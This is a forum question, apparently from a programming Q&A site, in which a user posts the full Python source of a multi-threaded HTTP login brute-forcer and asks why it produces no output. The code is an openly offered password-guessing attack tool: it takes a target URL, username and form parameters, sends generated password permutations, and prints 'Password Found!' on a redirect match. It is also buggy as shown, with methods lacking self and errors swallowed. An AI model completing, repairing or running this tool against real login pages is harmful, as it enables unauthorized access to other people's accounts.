I've built this bruteforcer in python, which use multi-threading that balances the process of sending multiple requests for each word length. For a maximum of N threads that can run simultaneously with N cores on the CPU.
The problem is that it doesn't seem to do nothing, when it runs it prints only the print statement in the main source file, but doesn't print the words as they've been sended...
This is the main source file:
import argparse
import sys
import os
import threading
from HttpLogin import HttpLogin
def main(thread_pool, event):
for i in range(len(thread_pool)):
try:
thread_pool[i].join()
except:
event.set()
parser = argparse.ArgumentParser(description="A complete Http Bruteforcer by St3veR0nix", )
Required = parser.add_argument_group("required arguments")
Required.add_argument("-u", "--url", type=str, required=True, help="Set the target url")
Required.add_argument("-p", "--port", type=int, required=True, help="Port number")
Required.add_argument("-U", "--username", type=str, required=True, help="The Username to use for login")
Required.add_argument("-a", "--uri", type=str, required=True, help="A reference URI for knowing if the login was succesfull, like /example.php")
Required.add_argument("-up", "--user-parameter", required=True, help="The parameter for the user in http body request")
Required.add_argument("-pp", "--pass-parameter", required=True, help="The parameter for the password in http body request")
parser.add_argument("-c", "--char", type=int, required=False, default=1, help="Character set: < 1 = a-z, 2 = 0-9, 3 = A-Z, 4 = a-z0-9, 5 = A-Z0-9, 6 = a-zA-Z0-9 >")
parser.add_argument("-m", "--min", type=int, required=False, default=1, help="Minimum length of permutations, default=1")
parser.add_argument("-M", "--max", type=int, required=False, default=1, help="Maximum length of permutations, default=1")
parser.add_argument("-r", "--request-method", type=str, required=False, default="GET", help="The request method, GET or POST, default=GET" )
parser.add_argument("-b", "--body", type=str, required=False, default="", help="Additional http body parameters, must be like example=test or example=test&example2=test2 and so on")
args = parser.parse_args()
print("Setting target URL to " + args.url + " on port " + str(args.port) + "...")
print("Setting method of the request to " + args.request_method + "...")
print("Setting " + str(args.max) + " threads for permutations...")
print("\nStarting Bruteforce with username " + args.username)
character_dictionary = {
1 : ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm','n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z'],
2 : ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9'],
3 : ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M',
'N','O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y','Z'],
4 : ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm',
'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z',
'0', '1', '2', '3', '4', '5', '6', '7', '8', '9'],
5 : ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M',
'N','O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y','Z',
'0', '1', '2', '3', '4', '5', '6', '7', '8', '9'],
6 : ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm',
'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z',
'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M',
'N','O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y','Z',
'0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
}
characters = character_dictionary[args.char]
perm = args.min
thread_pool = []
event = threading.Event()
for i in range(args.max):
if perm > args.max:
break
bf = HttpLogin(args.url, args.port, perm, characters, args.uri, args.user_parameter, args.pass_parameter, args.username, args.body, args.request_method, event)
if perm <= args.max:
thread_pool.append(bf)
thread_pool[i].start()
perm += 1
main(thread_pool, event)
And this is the HttpLogin class definition as HttpLogin.py
import threading
import requests
class HttpLogin(threading.Thread):
host = ""
port = 0
perm = 0
char_set= []
URI = "/"
user_p = ""
passwd_p = ""
username = ""
http_method = "GET"
event = threading.Event()
body = ""
data = {}
def __init__(self, host, port, perm, char_set, URI, user_p, passwd_p, username, body, http_method, event):
threading.Thread.__init__(self)
self.host = host
self.port = port
self.perm = perm
self.char_set = char_set
self.URI = URI
self.user_p = user_p
self.passwd_p = passwd_p
self.username = username
self.http_method = http_method
self.event = event
self.body = body
self.data[self.user_p] = self.username
try:
splitted_body = self.body.split("&")
for s in splitted_body:
try:
parameter = s.split("=")[0]
value = s.split("=")[1]
self.data[parameter] = value
except:
pass
except:
splitted_body = self.body.split("=")
self.data[splitted_body[0]] = splitted_body[1]
def run(self):
while not self.event.is_set():
buf = self.char_set[0] * self.perm
try:
send_permutations(buf, len(buf), self.char_set)
except:
pass
def send_permutations(buf, buf_l, char_set):
i = buf_l - 1
if i < 0:
return
for c in char_set:
buf[i] = c
print(buf)#, end="\r")
try:
res = sendlogin(buf)
if isLogin(res) == True:
print("\n\nPassword Found! --> " + buf)
self.event.set()
except:
pass
send_permutations(buf, buf_l -1, char_set)
def sendlogin(password):
self.data[self.passwd_p] = password
res = None
if self.http_method == "GET":
res = requests.get(self.url, data=self.data)
elif self.http_method == "POST":
res = requests.post(self.url, data=self.data)
return res
def isLogin(res):
for i in res.history:
if i.headers['location'] == self.uri:
return True
return False
The program asks for parameters, if you would like to reproduce the problem on your own, you should comment those lines or set some default values.